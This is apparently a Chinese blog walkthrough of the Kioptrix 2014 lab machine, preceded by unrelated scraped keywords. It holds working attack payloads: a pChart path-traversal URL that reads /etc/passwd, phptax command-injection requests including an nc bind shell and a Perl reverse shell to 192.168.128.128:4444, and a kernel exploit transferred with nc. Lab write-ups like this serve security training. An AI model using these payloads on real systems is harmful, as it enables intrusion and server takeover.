济南外贸网站,个人建站项目,icp备案管理系统,乐清门户网站建设个人博客 WuTongSec
欢迎大佬指点
打点
nmap 192.168.128.0/24 -sP 找ip
nmap 192.168.128.137 --min-rate 10000 -p- 简单全端口扫描
nmap 192.168.128.137 -sC -sV -O -sT 详细 脚本 版本 系统 扫描
dirsearch -u http://192.168.128.137 目录扫描 PORT S…个人博客 WuTongSec
欢迎大佬指点
打点
nmap 192.168.128.0/24 -sP 找ip
nmap 192.168.128.137 --min-rate 10000 -p- 简单全端口扫描
nmap 192.168.128.137 -sC -sV -O -sT 详细 脚本 版本 系统 扫描
dirsearch -u http://192.168.128.137 目录扫描 PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
源代码中有 cms框架 拼接一下接口 8080端口没有权限 利用
先搜索一下pChart2.1.3 exp exp版本对的上 把exp复制到当前目录
searchsploit pChart
searchsploit pChart -m 31173 查看exp信息 有xss和路径穿越遍历 payload
hxxp://localhost/examples/index.php?ActionViewScript%2f..%2f..%2fetc/passwd
http://192.168.128.137/pChart2.1.3/examples/index.php?ActionViewScript%2f..%2f..%2fetc/passwd 在只能读取的情况下 尝试读取apache的默认配置文件
搜索一下FreeBSD系统下的apache的默认配置文件
https://cwiki.apache.org/confluence/display/HTTPD/DistrosDefaultLayout
https://cwiki.apache.org/ 是 Apache Software Foundation (ASF) 的一个 Confluence【汇流】 维基站点它为 ASF 旗下的各个项目提供了一个协作和文档管理的平台
/usr/local/etc/apache22/httpd.conf
结合文件读取
http://192.168.128.137/pChart2.1.3/examples/index.php?ActionViewScript%2f..%2f..%2f/usr/local/etc/apache22/httpd.conf ServerRoot 和 DocumentRoot:
ServerRoot 指定了 Apache 服务器的根目录。
DocumentRoot 指定了 Web 内容的根目录。了解这个路径有助于查找网站文件有时可能包含敏感信息或未公开的资源。
Directory 和 Files 指令:
这些指令定义了对特定目录和文件的访问控制。检查这些部分可以揭示是否存在宽松的安全设置例如允许目录浏览Options Indexes这可能会暴露文件结构给攻击者。
Include 指令:
Include 可以加载额外的配置文件或目录中的所有 .conf 文件。确认哪些文件被包含进来因为它们可能含有其他重要的配置或者敏感信息。
LoadModule 指令:
列出了已加载的模块。某些模块如 mod_php, mod_perl, 或 mod_python 可能会提供额外的功能但也可能引入安全风险。特别是如果你看到不常见的模块应该进一步调查其功能和潜在影响。
ScriptAlias 和 Alias 指令:
ScriptAlias 通常用于指定 CGI 脚本的执行路径。Alias 用来映射 URL 到文件系统中的某个位置。注意这些路径因为它们可能是执行任意代码或访问特殊资源的入口点。
ErrorLog 和 CustomLog 指令:
分别指定了错误日志和访问日志的位置。日志文件可能包含有关服务器行为的重要信息包括可能的错误、警告以及用户活动记录。特别要留意是否有关于 SQL 注入、命令注入等攻击尝试的日志条目。 意思是我们需要这个User-Agent头
SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser
GET /phptax/ HTTP/1.1
Host: 192.168.128.137:8080
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent:Mozilla/4.0 Mozilla4_browser
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7
Referer: http://192.168.128.137:8080/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
把数据包换一下 每次都要换Mozilla/4.0 Mozilla4_browser
有一个 phptax 查一下有没有exp 25849 这个exp 需要一个php_curl apt install里面没有那就换一个 这个exp是 一个命令执行的 可以反弹shell回来 靶机做好镜像 我自己很多时候发包没有回复 多恢复镜像可以了 http://localhost/phptax/drawimage.php?pfilezxxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;pdfmake
http://192.168.128.137:8080/phptax/drawimage.php?pfilezxxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;pdfmake
数据包
GET /phptax/drawimage.php?pfilezxxx;%20id/tmp/111;pdfmake HTTP/1.1
Host: 192.168.128.137:8080
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/4.0 Mozilla4_browser
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7
Referer: http://192.168.128.137:8080/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
我们写一个命令 whoami/tmp/qwer 使用之前的读取文件payload可以看到是成功的 反弹shell
nc -lvnp 4444
试了很多的反弹shell 还是只有perl 可以
GET /phptax/drawimage.php?pfilezxxx;%20perl%20-e%20use%20Socket%3b%24i%3d%22192.168.128.128%22%3b%24p%3d4444%3bsocket(S%2cPF_INET%2cSOCK_STREAM%2cgetprotobyname(%22tcp%22))%3bif(connect(S%2csockaddr_in(%24p%2cinet_aton(%24i))))%7bopen(STDIN%2c%22%3e%26S%22)%3bopen(STDOUT%2c%22%3e%26S%22)%3bopen(STDERR%2c%22%3e%26S%22)%3bexec(%22%2fbin%2fsh%20-i%22)%3b%7d%3b;pdfmake HTTP/1.1
Host: 192.168.128.137:8080
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/4.0 Mozilla4_browser
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7
Referer: http://192.168.128.137:8080/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
反弹shell命令
GET /phptax/drawimage.php?pfilezxxx; perl -e use Socket;$i192.168.128.128;$p4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(tcp));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,S);open(STDOUT,S);open(STDERR,S); 推荐一个插件 hack tools 很多实用的命令 反弹shell 命令行 提权
刚开始尝试了 suid提权 发现没有
计划任务 也不行
sudo 也不行
那就只有内核提权了 去找exp
$ uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 rootfarrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
上传nc -lvnp 233 28718.c
下载nc 192.168.128.128 233 28718.c 编译文件 生成的是默认 a.out
成功 总结
反弹shell有的多种
上传nc -lvnp 233 28718.c
下载nc 192.168.128.128 233 28718.c
这个地方是查各种系统 apache的默认文件信息的
DistrosDefaultLayout - HTTPD - Apache Software Foundation
